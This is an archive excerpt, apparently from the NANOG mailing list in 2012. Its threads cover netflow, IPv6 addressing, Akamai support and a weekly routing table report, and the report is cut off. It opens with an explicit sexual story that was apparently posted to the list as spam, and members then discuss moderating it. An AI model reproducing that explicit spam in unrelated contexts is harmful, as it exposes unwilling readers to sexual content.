<1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <1342201544.85760.YahooMailNeo@web140805.mail.bf1.yahoo.com> I finally got home. The car ride felt like it took forever. My clothes tattered by either my superhumanly strong boner, or the amazing sex I just had. For the first time in literally 10 years, I was crying. I wasn't a guy who cried. But this...I betrayed my wife. I loved her. And no matter how many times she said it was fine, I still felt horrible. "What the..." She said, as I walked into the house. "Tim? What's wrong, what happened?" She was worried. "I'm so sorry..." I said. "I'm so sorry." "Sorry for what? What happened? Why are your clothes ripped?" She asked. "I didn't want to have sex with her Amanda. I couldn't help it...all these women...they won't leave me alone." I said, falling to my knees, and hugging her around her torso. She smiled a bit. "Tim...it's alright...I don't know why you are so broken up over this. I told you it was okay." "No Amanda, it's not okay. You wouldn't do this to me. I wouldn't want you to, and you wouldn't do it." I said. "Your right. I wouldn't. Because you told me not to. But I know if I told you not to, you wouldn't have either." She said. "No." I responded. "Given enough time, I would've cracked. This isn't who I am. I don't know what's happening to me. I don't want to only think about sex. I don't want to grow if this is what it turns me into." I said. "Tim, I would be selfish to not share..." She said. "Stop it!" I said, I stood up. "I don't want to be shared! I'm not a fucking lawn mower." I was pissed. I stormed out of the house, still in tattered clothes. A block away was a park. It was later in the day, and there wasn't anyone there. It was surrounded by trees, so it didn't get much outside observation. I just wanted to sit, and think. "Tim!" She said, out the door, on the porch. I just kept walking. "God dammit." I said, walking past the park. There were people there, and I didn't want to expose myself. I went farther, into the woods nearby. It wasn't dense, and I was able to walk through easily. My mind was going a mile a minute, my emotions were all over the place. I began to get dizzy. I stumbled around a bit, and then leaned back against a tree. For a moment, the feeling was gone, and I stood up straight. Then it overwhelmed me again. I looked down at myself. Something was happening. I looked at my hands. This was getting weird. I could see...I could see them...growing. "Oh God..." I said. I looked down, I watched my chest balloon outward slowly. I looked to my side, and watched my arms and shoulders building up more and more muscle, before my very eyes. "God...no...." I grunted, and stumbled back, and leaned against the tree again. My penis started to erect, but I wasn't aroused. I grunted again, as I felt my back muscles growing into the tree. I expressed my frustration with this, as I felt my back slowly being scratched as it slide upward along the tree. I was getting taller too. I looked down again, my penis fully erect. "No..." I said. "No no no..." Watching my penis swell up larger. "Don't grow...stop..." All I could do was watch, as my penis grow just past my previous size. I let out a louder grunt, and my muscles began to rip out of the parts of my shirt that weren't ripped. My thighs breaking through the seams of my pants. My butt filling with muscle pushing anything that was left outward. It ended after what seemed like hours, but was only a few minutes. I wasn't much taller. I was 6'9" that morning, but I gained an inch and a half in height. My penis swelled to just below 14 inches, and just above 8 inches around. My testicles swelled slightly too. But the biggest impact were my muscles. It was obvious, I put on more than 60 lbs. I was now 390 lbs, of strong, monstrous muscle. I had no idea what to do. I had to get back to Amanda. I grunted, and fell into the doorway. Amanda was on the phone. "I think that's him, I'll call you back." She said, and turned the corner. Her eyes widened. "Tim!" She said. I was breathing heavy. "I need to go to the doctor..." I said, sitting up. Amanda's voice seemingly healed me. I slowly made it to my feet. I shook my head... "Tim...you...did you grow?" She said. "Your muscles are...massive." She said, in awe. There was a silence for a few moments, and she slowly stepped back, and grabbed her keys. When she came back, the door was closed. "Tim..." She said, a bit confused. I walked toward her. "Do you still wanna go?" She asked. "Not yet." I said. I picked grabbed her waist, and threw her over my shoulder with one hand. She laughed. "Tim!" She said, excited. She began to feign helplessness. "No, please, don't take me to your evil, well furnished bedroom and have your way with me!" She joked, and I walked upstairs with her. I threw her on the bed, and she bounced. She laughed again. "Tim, I've never seen you like this..." She said. I grabbed her shirt and bra at the same time with one of my massive hands, and pulled them off of her in one quick motion, and she gasped, and sighed softly. "Tim...this is really hot..." She said, as I grabbed her by the belt, and picked her up off the bed. I held her against my chest and we began to kiss. I grabbed her pants on both sides of her hips, and pulled them apart, ripping them right off her. She was already wet, as she ground her hips into me over her thong. I dropped her on the bed again, and she landed on her butt. She quickly spun around, and leaned over the bed, ready to go at it from behind. I easily ripped off her thong. Slowly, I began to plunge myself into her. I was having trouble, trying to keep myself low enough to penetrate her because of our height differences, but I managed. "Oh...Tim...you are so big..." She said. "I can't wait until I'm as big as you." I stopped. She looked back at me with a confused look on her face. "What did you say?" "Huh? I didn't say anything." She said. I should've interrogated her, but I couldn't. I just went back to giving it to her. "I thought you said...you were gonna get as big as me." "What?" She said. I began to notice a distortion. Something was different. I couldn't figure it out. "That's what it sounded like." I said. "Ooooh....that would be awesome. Imagine if I was growing with you, Tim." She said, always looking away from me. I set my hand on her waist. "At least...I wouldn't be alone." I panted. "You aren't alone...you just...stand out more." She panted back. "But imagine...me growing bigger..." She said. I didn't. I refused. I just focused on her body, how good this all felt. "I guess if you...didn't mind." "Oh...I would...love it." She said. Oh God. She was growing. I could see it. I watched her back slowly lengthen. "Oh God..." I said. "If I grew taller..." Her legs lengthened, her butt slowly rising higher and higher. "I don't understand, Amanda...how..." "Curvier..." Her chest was touching the bed, and I began to see her side boob slowly moving out to the side as her breasts enlarged. "...how is this happening?" I asked. "Oh...I'd be so much stronger..." Her body remained in it's incredibly fit shape, but there was just more and more. My hands were on the sides of her hips, as I felt her ass expand in my hands. She began to prop herself up on her arms, her legs too long to allow her to just lean over the bed. "Amanda...you are growing...right now..." I said, unable to stop having sex with her. "...how many heads I'd turn just walking down the street..." She continued to grow, quickly, in front of my eyes, I saw it happening. I felt it. This had to be real. How was this happening? "A-Amanda...I'm..." "I'd...be...a....goddess...." She said, as we both had the most intense orgasms of our lives. I unleashed load after load after load, more than I had ever done before. For a good 10 minutes, she was unable to move, as she shivered and grabbed the blankets below her, in a perpetual state of orgasm. I stepped back, as I finished unleashing my load. She felt to the ground without my support. She must've been as tall as I was. Her legs were thick with muscle, but perfect, without a blemish. Her butt lifted her body off the ground. It was an amazing contrast in relation to her waist, which was seemingly unchanged. Her breasts were absolutely massive, hanging off to her sides, easy breast the size of a basketball. She shoulders were broad, and her head remained relatively the same size, making her body look all the more massive. She was lost in climax. It looked like she was having a seizure. "Amanda...are you...ok?" I asked. "I...oooohhhh..." She managed to say, as she curled up slightly, then uncurled again. "...keep...cummminnnnggggg...." She said, quaking and shaking with delight, the smile never leaving her face. I looked at her amazing body in awe, but still had this fear in the back of my mind. I took a deep breath, and closed my eyes. When I opened them, she was in the same position, but back to normal. I waited until her orgasms finally ends. "Amanda..." "Huh?" She said, opening her eyes, looking up at me. "I think we should go to the hospital..." From shortdudey123 at gmail.com Fri Jul 13 12:46:06 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Fri, 13 Jul 2012 12:46:06 -0500 Subject: The Cidr Report In-Reply-To: <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: if the admins are not going to moderate this list... give me the admin password to the list serve and i will set it up right... gees From skeeve at eintellego.net Fri Jul 13 12:48:47 2012 From: skeeve at eintellego.net (Skeeve Stevens) Date: Sat, 14 Jul 2012 03:48:47 +1000 Subject: The Cidr Report In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: I think the effort to moderate this particular list would be far to much effort. * * *Skeeve Stevens, CEO - *eintellego Pty Ltd skeeve at eintellego.net ; www.eintellego.net Phone: 1300 753 383; Cell +61 (0)414 753 383 ; skype://skeeve facebook.com/eintellego ; linkedin.com/in/skeeve twitter.com/networkceoau ; blog: www.network-ceo.net The Experts Who The Experts Call Juniper - Cisco ? IBM On Sat, Jul 14, 2012 at 3:46 AM, Grant Ridder wrote: > if the admins are not going to moderate this list... give me the admin > password to the list serve and i will set it up right... gees > From hhoffman at ip-solutions.net Fri Jul 13 12:52:28 2012 From: hhoffman at ip-solutions.net (Harry Hoffman) Date: Fri, 13 Jul 2012 13:52:28 -0400 Subject: Real world sflow vs netflow? In-Reply-To: References: Message-ID: <5000605C.3030804@ip-solutions.net> Hi David, I'm not sure that sflow is going to get your the granularity that you are looking for. It's usually better to start more granular and then aggregate into larger flows when you graph or reference for historic values. Have you looked at other options, such as argus [1] to collect flow data outside of the networking gear? This way the networking gear can do what its primary job and flow collection can happen elsewhere. There's a whole argus community that discusses the information security topics you're interested in and Carter, the guy who wrote all (?) of the code is very responsive. Argus can also take in NetFlow flows from your routers too. There are obviously other tools available, that may work as well or better, but argus is one I've been using with great success in a fairly heavily trafficked environment. Cheers, Harry [1] http://www.qosient.com/argus/ On 07/13/2012 01:30 PM, David Hubbard wrote: > Can anyone on or off list give me some real world > thoughts on sflow vs netflow for border > routers? (multi-homed, BGP, straight v4 & v6 only > for web hosting, no mpls, vpns, vlans, etc.) > > Finding it hard to decipher the vendor version > of the answer to that question. We use > netflow v9 currently but are considering hardware > that would be sflow. We don't use it for > billing purposes, mostly for spotting malicious > remote hosts doing things like scans, spotting > traffic such as weird ports in use in either > direction that warrant further investigation, > watching for ddos/dos destinations to act on > mitigation, or investigating the nature of unusual > levels of traffic on switch ports that set off > alarms. I'm concerned things like port scans, > etc. won't be picked up by the NMS if fed by > sflow due to the sampling nature, or similar > concern if 500 ssh connections by the same remote > host are sampled as 1 connection, etc. Of course > these concerns were put in my head by someone > interested in me continuing to use equipment that > happens to output netflow data, hence me wanting some > real people answers. :-) > > Thanks! > > > From shrdlu at deaddrop.org Fri Jul 13 12:56:05 2012 From: shrdlu at deaddrop.org (Lynda) Date: Fri, 13 Jul 2012 10:56:05 -0700 Subject: The Cidr Report In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <50006135.8070202@deaddrop.org> On 7/13/2012 10:46 AM, Grant Ridder wrote: > if the admins are not going to moderate this list... give me the admin > password to the list serve and i will set it up right. These emails seem to be originating from comcast (75.144.246.6). Please note I said "seem to be" since it's very easy to forge such things. I was quite sad when yahoo started dispensing *new* accounts from Rocketmail (a property they acquired in the long ago times), since I have a rocketmail account that long predates yahoo, or the acquisition. Still, there needs to be a filter of some sort set up. Mailman permits this, and I'd be a fan of it. It seems to be generated by someone who has the serious hate on for the list. That actually narrows it down quite a bit. Maybe I'll do a bit of traffic analysis over the weekend. Or not... -- Politicians are like a Slinky. They're really not good for anything, but they still bring a smile to your face when you push them down a flight of stairs. From Jean-Francois.TremblayING at videotron.com Fri Jul 13 12:56:11 2012 From: Jean-Francois.TremblayING at videotron.com (Jean-Francois.TremblayING at videotron.com) Date: Fri, 13 Jul 2012 13:56:11 -0400 Subject: using "reserved" IPv6 space In-Reply-To: <50004AF9.9010601@gmail.com> Message-ID: -Hammer- a ?crit sur 13/07/2012 12:21:13 PM : > I like the ULA approach. Global and ULA are two approach, but there's a third one: GUA + ULA. We actually put a GUA on servers speaking publicly, a ULA on servers speaking in our domain only and *both* ULA and GUA on servers which talk both ways. Our datacenter firewalls are configured to enforce GUA-GUA and ULA-ULA connections only (just simple URPF over two interfaces). This setup works very well, surprisingly we've had very little source address selection problems so far (knock on wood). We're very happy that the separation between public and "private" networks is clear, it helps a lot with debugging and service separation. /JF From shortdudey123 at gmail.com Fri Jul 13 12:59:58 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Fri, 13 Jul 2012 12:59:58 -0500 Subject: The Cidr Report In-Reply-To: <50006135.8070202@deaddrop.org> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> <50006135.8070202@deaddrop.org> Message-ID: Mailman also allows keyword filtering On Fri, Jul 13, 2012 at 12:56 PM, Lynda wrote: > On 7/13/2012 10:46 AM, Grant Ridder wrote: > >> if the admins are not going to moderate this list... give me the admin >> password to the list serve and i will set it up right. >> > > These emails seem to be originating from comcast (75.144.246.6). Please > note I said "seem to be" since it's very easy to forge such things. I was > quite sad when yahoo started dispensing *new* accounts from Rocketmail (a > property they acquired in the long ago times), since I have a rocketmail > account that long predates yahoo, or the acquisition. > > Still, there needs to be a filter of some sort set up. Mailman permits > this, and I'd be a fan of it. It seems to be generated by someone who has > the serious hate on for the list. That actually narrows it down quite a > bit. Maybe I'll do a bit of traffic analysis over the weekend. > > Or not... > > -- > Politicians are like a Slinky. > They're really not good for anything, > but they still bring a smile to your face > when you push them down a flight of stairs. > > From jcdill.lists at gmail.com Fri Jul 13 13:20:44 2012 From: jcdill.lists at gmail.com (JC Dill) Date: Fri, 13 Jul 2012 11:20:44 -0700 Subject: The Cidr Report In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <500066FC.6030707@gmail.com> On 13/07/12 10:46 AM, Grant Ridder wrote: > if the admins are not going to moderate this list... give me the admin > password to the list serve and i will set it up right... gees +1 jc From robertg at garlic.com Fri Jul 13 13:32:13 2012 From: robertg at garlic.com (Robert Glover) Date: Fri, 13 Jul 2012 11:32:13 -0700 Subject: Akamai infrastructure tech Message-ID: <500069AD.7040705@garlic.com> If someone with Akamai is watching, can you please have someone from infrastructure contact me? We host an Akamai server, a drive started taking errors, Akamai shipped us a new drive, but did not tell us which of the eight drives in the server needs to be replaced. Normal contact channels have resulted in voicemail or no clue :( Thanks, -Robert From paul at paulstewart.org Fri Jul 13 13:39:56 2012 From: paul at paulstewart.org (Paul Stewart) Date: Fri, 13 Jul 2012 14:39:56 -0400 Subject: Akamai infrastructure tech In-Reply-To: <500069AD.7040705@garlic.com> References: <500069AD.7040705@garlic.com> Message-ID: <014c01cd6126$e7799990$b66cccb0$@paulstewart.org> That's unusual... we've gone through hard drive replacements many times and always gotten a detailed email from them before the hard drive arrived.... Paul -----Original Message----- From: Robert Glover [mailto:robertg at garlic.com] Sent: July-13-12 2:32 PM To: nanog at nanog.org Subject: Akamai infrastructure tech If someone with Akamai is watching, can you please have someone from infrastructure contact me? We host an Akamai server, a drive started taking errors, Akamai shipped us a new drive, but did not tell us which of the eight drives in the server needs to be replaced. Normal contact channels have resulted in voicemail or no clue :( Thanks, -Robert From trejrco at gmail.com Fri Jul 13 13:47:26 2012 From: trejrco at gmail.com (TJ) Date: Fri, 13 Jul 2012 14:47:26 -0400 Subject: using "reserved" IPv6 space In-Reply-To: References: <50004AF9.9010601@gmail.com> Message-ID: On Fri, Jul 13, 2012 at 1:56 PM, wrote: > -Hammer- a ?crit sur 13/07/2012 12:21:13 PM : > > > I like the ULA approach. > > Global and ULA are two approach, but there's a third one: GUA + ULA. We > actually put a GUA on servers speaking publicly, a ULA on servers speaking > in our domain only and *both* ULA and GUA on servers which talk both ways. > Our datacenter firewalls are configured to enforce GUA-GUA and ULA-ULA > connections only (just simple URPF over two interfaces). > > This setup works very well, surprisingly we've had very little source > address selection problems so far (knock on wood). We're very happy that > the separation between public and "private" networks is clear, it helps a > lot with debugging and service separation. > Of the top of my head, the first problem you might hit there is WRT multicast ... *(ULA might "win" some source address selections that you want GUA to win)* /TJ From owen at delong.com Fri Jul 13 13:48:36 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 13 Jul 2012 11:48:36 -0700 Subject: DNS Changer items In-Reply-To: <8418792.13134.1341682284168.JavaMail.root@benjamin.baylink.com> References: <8418792.13134.1341682284168.JavaMail.root@benjamin.baylink.com> Message-ID: <7666DE8C-909C-4C4A-9CDB-16C49574F183@delong.com> On Jul 7, 2012, at 10:31 AM, Jay Ashworth wrote: > ----- Original Message ----- >> From: "Seth Mattinen" > >>> On Fri, 06 Jul 2012 13:20:55 -0400, Andrew Fried said: >>>> The dns-ok.us site is getting crushed from all the sudden media >>>> interest. >>> >>> One wonders why it's so hard to get the media interested when it >>> would be *helpful*. DNS Changer gets traction like 3 days before the >>> drop dead date, IPv6 gets on the radar *after* we run out of v4 /8's >>> to give to regionals, etc... >> >> Reactive is easier to justify to the powers that be than proactive. > > It's easier to justify *not* being smart enough to deal with the problem > when it doesn't cause a major disruption? > When it isn't causing a major problem, the powers that be have a harder time understanding the need to act. Once it is causing a major disruption, the powers that be have no trouble understanding the need to act. This is not veneration of stupidity, it is human nature. Often summarized in the colloquialism "The squeaky wheel gets the grease." Owen From nanog at techmonkeys.org Fri Jul 13 13:58:07 2012 From: nanog at techmonkeys.org (Jeff Fisher) Date: Fri, 13 Jul 2012 12:58:07 -0600 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <50006FBF.3000408@techmonkeys.org> On 07/13/2012 06:43 AM, Brandon Applegate wrote: > So I sent an email over a week ago to ipv6req at networksolutions.com - and > since I've only recieved the auto reply. > > A year or so ago I did this and got very quick turnaround, but now just > dead air (sent another email yesterday). > > Wanted to see if others had the same results (recently) and any advice > before I call into phone tree hell. Thanks. I waited over a month before I finally got fed up and e-mailed nanog for advice. I was told to e-mail listen at networksolutions.com and amazingly, it worked -- within a day, my records were changed. Jeff From cscora at apnic.net Fri Jul 13 14:10:16 2012 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 14 Jul 2012 05:10:16 +1000 (EST) Subject: Weekly Routing Table Report Message-ID: <201207131910.q6DJALBm008870@thyme.rand.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG, TRNOG, CaribNOG and the RIPE Routing Working Group. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 14 Jul, 2012 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 416525 Prefixes after maximum aggregation: 175957 Deaggregation factor: 2.37 Unique aggregates announced to Internet: 202804 Total ASes present in the Internet Routing Table: 41495 Prefixes per ASN: 10.04 Origin-only ASes present in the Internet Routing Table: 33311 Origin ASes announcing only one prefix: 15683 Transit ASes present in the Internet Routing Table: 5581 Transit-only ASes present in the Internet Routing Table: 135 Average AS path length visible in the Internet Routing Table: 4.5 Max AS path length visible: 31 Max AS path prepend of ASN ( 51742) 24 Prefixes from unregistered ASNs in the Routing Table: 404 Unregistered ASNs in the Routing Table: 131 Number of 32-bit ASNs allocated by the RIRs: 2974 Number of 32-bit ASNs visible in the Routing Table: 2603 Prefixes from 32-bit ASNs in the Routing Table: 6761 Special use prefixes present in the Routing Table: 1 Prefixes being announced from unallocated address space: 162 Number of addresses announced to Internet: 2565104428 Equivalent to 152 /8s, 228 /16s and 99 /24s Percentage of available address space announced: 69.2 Percentage of allocated address space announced: 69.3 Percentage of available address space allocated: 99.9 Percentage of address space in use by end-sites: 93.0 Total number of prefixes smaller than registry allocations: 144361 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 101982 Total APNIC prefixes after maximum aggregation: 32789 APNIC Deaggregation factor: 3.11 Prefixes being announced from the APNIC address blocks: 102433 Unique aggregates announced from the APNIC address blocks: 42106 APNIC Region origin ASes present in the Internet Routing Table: 4715 APNIC Prefixes per ASN: 21.72 APNIC Region origin ASes announcing only one prefix: 1243 APNIC Region transit ASes present in the Internet Routing Table: 739 Average APNIC Region AS path length visible: 4.6 Max APNIC Region AS path length visible: 26 Number of APNIC region 32-bit ASNs visible in the Routing Table: 245 Number of APNIC addresses announced to Internet: 704212608 Equivalent to 41 /8s, 249 /16s and 110 /24s Percentage of available APNIC address space announced: 82.3 APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 131072-133119 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 152258 Total ARIN prefixes after maximum aggregation: 77460 ARIN Deaggregation factor: 1.97 Prefixes being announced from the ARIN address blocks: 153294 Unique aggregates announced from the ARIN address blocks: 68403 ARIN Region origin ASes present in the Internet Routing Table: 15189 ARIN Prefixes per ASN: 10.09 ARIN Region origin ASes announcing only one prefix: 5766 ARIN Region transit ASes present in the Internet Routing Table: 1612 Average ARIN Region AS path length visible: 4.1 Max ARIN Region AS path length visible: 24 Number of ARIN region 32-bit ASNs visible in the Routing Table: 17 Number of ARIN addresses announced to Internet: 1071305600 Equivalent to 63 /8s, 218 /16s and 211 /24s Percentage of available ARIN address space announced: 56.7 ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 393216-394239 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 103627 Total RIPE prefixes after maximum aggregation: 55173 RIPE Deaggregation factor: 1.88 Prefixes being announced from the RIPE address blocks: 105822 Unique aggregates announced from the RIPE address blocks: 67104 RIPE Region origin ASes present in the Internet Routing Table: 16657 RIPE Prefixes per ASN: 6.35 RIPE Region origin ASes announcing only one prefix: 8072 RIPE Region transit ASes present in the Internet Routing Table: 2711 Average RIPE Region AS path length visible: 5.0 Max RIPE Region AS path length visible: 31 Number of RIPE region 32-bit ASNs visible in the Routing Table: 1715 Number of RIPE addresses announced to Internet: 635650436 Equivalent to 37 /8s, 227 /16s and 65 /24s Percentage of available RIPE address space announced: 92.4 RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 196608-199679 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 42512 Total LACNIC prefixes after maximum aggregation: 8355 LACNIC Deaggregation factor: 5.09 Prefixes being announced from the LACNIC address blocks: 45201 Unique aggregates announced from the LACNIC address blocks: 21759 LACNIC Region origin ASes present in the Internet Routing Table: 1610 LACNIC Prefixes per ASN: 28.08 LACNIC Region origin ASes announcing only one prefix: 430 LACNIC Region transit ASes present in the Internet Routing Table: 307 Average LACNIC Region AS path length visible: 4.7 Max LACNIC Region AS path length visible: 25 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 621 Number of LACNIC addresses announced to Internet: 112309160 Equivalent to 6 /8s, 177 /16s and 179 /24s Percentage of available LACNIC address space announced: 66.9 LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 262144-263167 plus ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 9181 Total AfriNIC prefixes after maximum aggregation: 2126 AfriNIC Deaggregation factor: 4.32 Prefixes being announced from the AfriNIC address blocks: 9613 Unique aggregates announced from the AfriNIC address blocks: 3291 AfriNIC Region origin ASes present in the Internet Routing Table: 553 AfriNIC Prefixes per ASN: 17.38 AfriNIC Region origin ASes announcing only one prefix: 172 AfriNIC Region transit ASes present in the Internet Routing Table: 124 Average AfriNIC Region AS path length visible: 4.4 Max AfriNIC Region AS path length visible: 25 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 5 Number of AfriNIC addresses announced to Internet: 41186304 Equivalent to 2 /8s, 116 /16s and 116 /24s Percentage of available AfriNIC address space announced: 40.9 AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4766 2733 11119 1236 Korea Telecom (KIX) 17974 2217 558 80 PT TELEKOMUNIKASI INDONESIA 7545 1690 301 86 TPG Internet Pty Ltd 4755 1613 388 162 TATA Communications formerly 9829 1303 1085 28 BSNL National Internet Backbo 9583 1167 88 505 Sify Limited 7552 1128 1062 11 Vietel Corporation 4808 1117 2053 318 CNCGROUP IP network: China169 24560 1037 385 165 Bharti Airtel Ltd., Telemedia 9498 982 291 68 BHARTI Airtel Ltd. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 6389 3389 3773 187 bellsouth.net, inc. 7029 3337 998 177 Windstream Communications Inc 18566 2088 382 181 Covad Communications 1785 1935 681 130 PaeTec Communications, Inc. 22773 1665 2911 121 Cox Communications, Inc. 20115 1648 1571 615 Charter Communications 4323 1575 1043 384 Time Warner Telecom 30036 1388 269 785 Mediacom Communications Corp 7018 1258 10044 823 AT&T WorldNet Services 7011 1197 320 696 Citizens Utilities Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN RIPE Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 8402 1589 544 16 Corbina telecom 2118 1023 97 14 EUnet/RELCOM Autonomous Syste 12479 796 741 94 Uni2 Autonomous System 34984 728 189 174 BILISIM TELEKOM 6830 709 2292 443 UPC Distribution Services 31148 702 37 9 FreeNet ISP 20940 684 220 531 Akamai Technologies European 8551 577 364 61 Bezeq International 13188 576 100 10 Educational Network 3320 500 8443 410 Deutsche Telekom AG Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE LACNIC Region per AS prefix count summary ----------------------------------------- ASN No of nets /20 equiv MaxAgg Description 28573 2003 1214 55 NET Servicos de Comunicao S.A 10620 1990 346 208 TVCABLE BOGOTA 6503 1523 418 66 AVANTEL, S.A. 8151 1466 3042 343 UniNet S.A. de C.V. 7303 1454 934 194 Telecom Argentina Stet-France 6458 854 81 15 GUATEL 27947 714 73 93 Telconet S.A 11172 643 91 74 Servicios Alestra S.A de C.V 3816 588 246 90 Empresa Nacional de Telecomun 22047 583 326 15 VTR PUNTO NET S.A. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC AfriNIC Region per AS prefix count summary ------------------------------------------ ASN No of nets /20 equiv MaxAgg Description 8452 1156 958 13 TEDATA 24863 863 274 32 LINKdotNET AS number 6713 508 649 18 Itissalat Al-MAGHRIB 24835 285 80 8 RAYA Telecom - Egypt 3741 262 905 223 The Internet Solution 12258 197 28 62 Vodacom Internet Company 33776 194 12 18 Starcomms Nigeria Limited 29975 191 667 21 Vodacom 16637 170 664 87 MTN Network Solutions 15706 159 32 6 Sudatel Internet Exchange Aut Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC Global Per AS prefix count summary ---------------------------------- ASN No of nets /20 equiv MaxAgg Description 6389 3389 3773 187 bellsouth.net, inc. 7029 3337 998 177 Windstream Communications Inc 